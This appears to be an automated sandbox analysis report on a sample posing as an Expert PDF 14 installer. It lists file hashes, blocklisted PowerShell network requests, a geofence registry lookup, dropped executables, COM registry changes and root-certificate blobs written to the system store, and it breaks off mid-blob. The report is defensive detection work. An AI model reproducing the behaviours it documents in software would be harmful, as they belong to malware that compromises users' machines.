Analysis
-
max time kernel
1218s -
max time network
1234s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
17-03-2023 18:08
Static task
static1
Behavioral task
behavioral1
Sample
07d8c9f5-af55-421d-9023-7932ab1810d7.exe
Resource
win7-20230220-en
General
-
Target
07d8c9f5-af55-421d-9023-7932ab1810d7.exe
-
Size
107.4MB
-
MD5
92d910e072b9bbce6a329bbe9686cf7e
-
SHA1
4e4e2c6e1aaf406f1008eef4de4068c67a56c7f1
-
SHA256
07e3113b6d2367f8fab4668b46620fd6b6d15d0c3d21d4f066cedb8c54340e4b
-
SHA512
f5f10912ef3e2f6520aba4fe9986d174451b1eb8d38a0b652ed4a6d463d26d1bf121a26298616304b484d42ecc5c11a68ae295a9e92b0d09df5067f7af439e2a
-
SSDEEP
196608:0kkzOa/slizxM7S8ocpzL28DsOa0wyEcJ50:0kdYM71zaMsOaxbcJ2
Malware Config
Signatures
-
Blocklisted process makes network request 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeflow pid process 43 4392 powershell.exe 44 2456 powershell.exe 46 2492 powershell.exe 50 1924 powershell.exe 51 3080 powershell.exe 52 4252 powershell.exe 53 1568 powershell.exe 54 3676 powershell.exe 55 5020 powershell.exe 58 980 powershell.exe 87 2492 powershell.exe 88 5020 powershell.exe 89 3676 powershell.exe 90 980 powershell.exe 91 1568 powershell.exe 92 1924 powershell.exe 93 2456 powershell.exe 94 4252 powershell.exe 95 4392 powershell.exe 96 3080 powershell.exe 101 2492 powershell.exe 102 5020 powershell.exe 103 980 powershell.exe 104 1568 powershell.exe 105 3676 powershell.exe 106 4392 powershell.exe 107 4252 powershell.exe 110 2456 powershell.exe 113 3080 powershell.exe 116 1924 powershell.exe 118 2492 powershell.exe 119 5020 powershell.exe 127 1568 powershell.exe 129 980 powershell.exe 130 4252 powershell.exe 131 3080 powershell.exe 132 4392 powershell.exe 133 3676 powershell.exe 134 2456 powershell.exe 135 1924 powershell.exe 136 2492 powershell.exe 137 5020 powershell.exe 138 980 powershell.exe 139 1568 powershell.exe 140 4252 powershell.exe 141 3676 powershell.exe 142 4392 powershell.exe 143 3080 powershell.exe 144 2456 powershell.exe 145 1924 powershell.exe 149 2492 powershell.exe 150 5020 powershell.exe 152 980 powershell.exe 153 1568 powershell.exe 154 2456 powershell.exe 155 3676 powershell.exe 156 4252 powershell.exe 157 3080 powershell.exe 158 1924 powershell.exe 159 4392 powershell.exe 160 5020 powershell.exe 161 980 powershell.exe 162 2492 powershell.exe 163 1568 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
07d8c9f5-af55-421d-9023-7932ab1810d7.tmpdescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp -
Executes dropped EXE 3 IoCs
Processes:
07d8c9f5-af55-421d-9023-7932ab1810d7.tmpExpert_PDF.exeExpert_PDF_14_Installer.exepid process 3672 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp 116 Expert_PDF.exe 1300 Expert_PDF_14_Installer.exe -
Loads dropped DLL 5 IoCs
Processes:
07d8c9f5-af55-421d-9023-7932ab1810d7.tmpregsvr32.exeExpert_PDF.exeDllHost.exepid process 3672 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp 3672 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp 2612 regsvr32.exe 116 Expert_PDF.exe 4488 DllHost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 64 IoCs
Processes:
regsvr32.exeExpert_PDF_14_Installer.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{74A6753A-DE17-4161-BBF1-F930444A667A}\ = "IDownloadItemExternalApp" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6C789195-CB9C-4503-B896-76E5A1D9D0D0}\TypeLib\Version = "1.0" Expert_PDF_14_Installer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7D9D9D34-5DD0-425D-B577-29D2DB57DC90}\Version\ = "1.0" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{EC5ECDA9-D4FF-4B92-A8E4-BB343310AD6F}\ProxyStubClsid32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8BEE0069-45C2-4403-B726-50CF8288DDD2}\ = "IInstallItemExternalApp" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7E39BBB2-F9C5-488C-AC6C-DAA3EFFA4CE1}\TypeLib\Version = "1.0" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1410AE4F-1218-4A9F-87D9-666B1DB82FF1}\LocalizedString = "@%programdata%\\Expert PDF 14\\Installation\\Statistics.dll,-127" Expert_PDF_14_Installer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6C789195-CB9C-4503-B896-76E5A1D9D0D0}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" Expert_PDF_14_Installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{05B3D680-372E-48F5-9017-2CB60FAE4FBD}\InprocServer32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{05B3D680-372E-48F5-9017-2CB60FAE4FBD}\InprocServer32\ = "C:\\ProgramData\\Expert PDF 14\\Installation\\Statistics.dll" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{69B200C5-B71E-43C7-8807-B4D7285D0804}\InprocServer32\ThreadingModel = "Apartment" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{CA5A508D-5E26-4167-9871-E1686FB231F5}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{CA5A508D-5E26-4167-9871-E1686FB231F5}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{27DC8C77-EEBE-4533-9845-ABD40CEB455F}\InprocServer32\ThreadingModel = "Apartment" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{356EF9DF-D3FE-4DA6-9EF9-B29CEF99A571}\InprocServer32\ThreadingModel = "Apartment" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37172CF3-167C-4B55-B02D-3604464210DF}\InprocServer32\ThreadingModel = "Apartment" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{883556F2-137D-42B1-A379-EF040DB83897}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AC45A346-0197-4696-8D32-758EC0B0E4DF}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB369CC1-15D6-47B3-B7CA-3061B7DB8E2B}\TypeLib\Version = "1.0" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1410AE4F-1218-4A9F-87D9-666B1DB82FF1}\ = "Installer Class" Expert_PDF_14_Installer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{69B200C5-B71E-43C7-8807-B4D7285D0804}\InprocServer32\ = "C:\\ProgramData\\Expert PDF 14\\Installation\\Statistics.dll" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{88395ED4-CB15-449D-AA03-0286C132147C}\TypeLib\Version = "1.0" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{AB369CC1-15D6-47B3-B7CA-3061B7DB8E2B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{45B9EEC4-462E-427D-B2AA-26380735AE7A}\ = "IGeoIPStruct" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4149D4DA-11AA-4597-9AA5-A6E3DCD8DFB3}\TypeLib\Version = "1.0" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7D9D9D34-5DD0-425D-B577-29D2DB57DC90}\Version regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{066D076C-674B-477C-A219-17FE4B04FE7D}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{EC5ECDA9-D4FF-4B92-A8E4-BB343310AD6F} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{AB369CC1-15D6-47B3-B7CA-3061B7DB8E2B}\TypeLib regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{54D1BE8B-911E-4F28-BC0D-E7545D5FD83B}\TypeLib regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37172CF3-167C-4B55-B02D-3604464210DF}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0C65FB04-3503-4B15-A148-8904F9450F50}\Version\ = "1.0" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7EAF85B3-F511-4B8D-8731-95015ACED100}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A3D22F5C-199D-42A3-B1DE-215B57F8F065}\InprocServer32\ = "C:\\ProgramData\\Expert PDF 14\\Installation\\Statistics.dll" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{243F1D9D-80F0-42A2-9A44-3F6ADDCFE4EC}\ProxyStubClsid32 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7AE953E8-514E-4210-A41A-B6ACE120EC12}\InprocServer32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8E73C958-23B4-45B5-8B8C-346ACA41C9FC}\AppID = "{D512BD03-0077-4504-AE19-566B43F44E19}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F8CBFADD-0796-4046-9D10-B846E0118879}\TypeLib regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4149D4DA-11AA-4597-9AA5-A6E3DCD8DFB3}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E879C546-B160-435A-AC8D-2C8720BDE1F5}\ = "IStartItemModule" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{904A1997-BEDF-4442-9F5B-D1CBE8308AC1}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{27DC8C77-EEBE-4533-9845-ABD40CEB455F}\AppID = "{D512BD03-0077-4504-AE19-566B43F44E19}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A3D22F5C-199D-42A3-B1DE-215B57F8F065}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{634F0C3D-F260-4CC2-83A0-75CA11EE53FC}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8E73C958-23B4-45B5-8B8C-346ACA41C9FC}\InprocServer32\ThreadingModel = "Apartment" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB369CC1-15D6-47B3-B7CA-3061B7DB8E2B}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{243F1D9D-80F0-42A2-9A44-3F6ADDCFE4EC}\TypeLib\Version = "1.0" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E66B52BF-144D-4611-9366-62C9B3A3BD0B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA738FC0-B58C-4717-BF65-F2034D0ABC09}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F73F2CD9-8FD0-419C-9BD8-3CD10A82E263} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF8D15E0-84AC-4108-A158-348EEBA6C2FC}\InprocServer32\ThreadingModel = "Apartment" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{CA5A508D-5E26-4167-9871-E1686FB231F5}\ProxyStubClsid32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8BEE0069-45C2-4403-B726-50CF8288DDD2}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4149D4DA-11AA-4597-9AA5-A6E3DCD8DFB3}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0BBD5633-4BE2-42D0-BB7E-A021DF1E1753}\TypeLib regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F0943358-2D26-4A19-A9DF-C949F475DDE3} Expert_PDF_14_Installer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{904A1997-BEDF-4442-9F5B-D1CBE8308AC1}\AppID = "{D512BD03-0077-4504-AE19-566B43F44E19}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F73F2CD9-8FD0-419C-9BD8-3CD10A82E263}\InprocServer32\ = "C:\\ProgramData\\Expert PDF 14\\Installation\\Statistics.dll" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F8CBFADD-0796-4046-9D10-B846E0118879}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{69B200C5-B71E-43C7-8807-B4D7285D0804}\ = "DownloadItemMonetization Class" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8BEE0069-45C2-4403-B726-50CF8288DDD2}\ProxyStubClsid32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A299F69F-9A31-485B-9743-F015326A9B0D}\TypeLib\Version = "1.0" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{74A6753A-DE17-4161-BBF1-F930444A667A} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{634F0C3D-F260-4CC2-83A0-75CA11EE53FC}\InprocServer32\ = "C:\\ProgramData\\Expert PDF 14\\Installation\\Statistics.dll" regsvr32.exe -
Processes:
Expert_PDF.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Expert_PDF.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Expert_PDF.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Expert_PDF.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E Expert_PDF.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604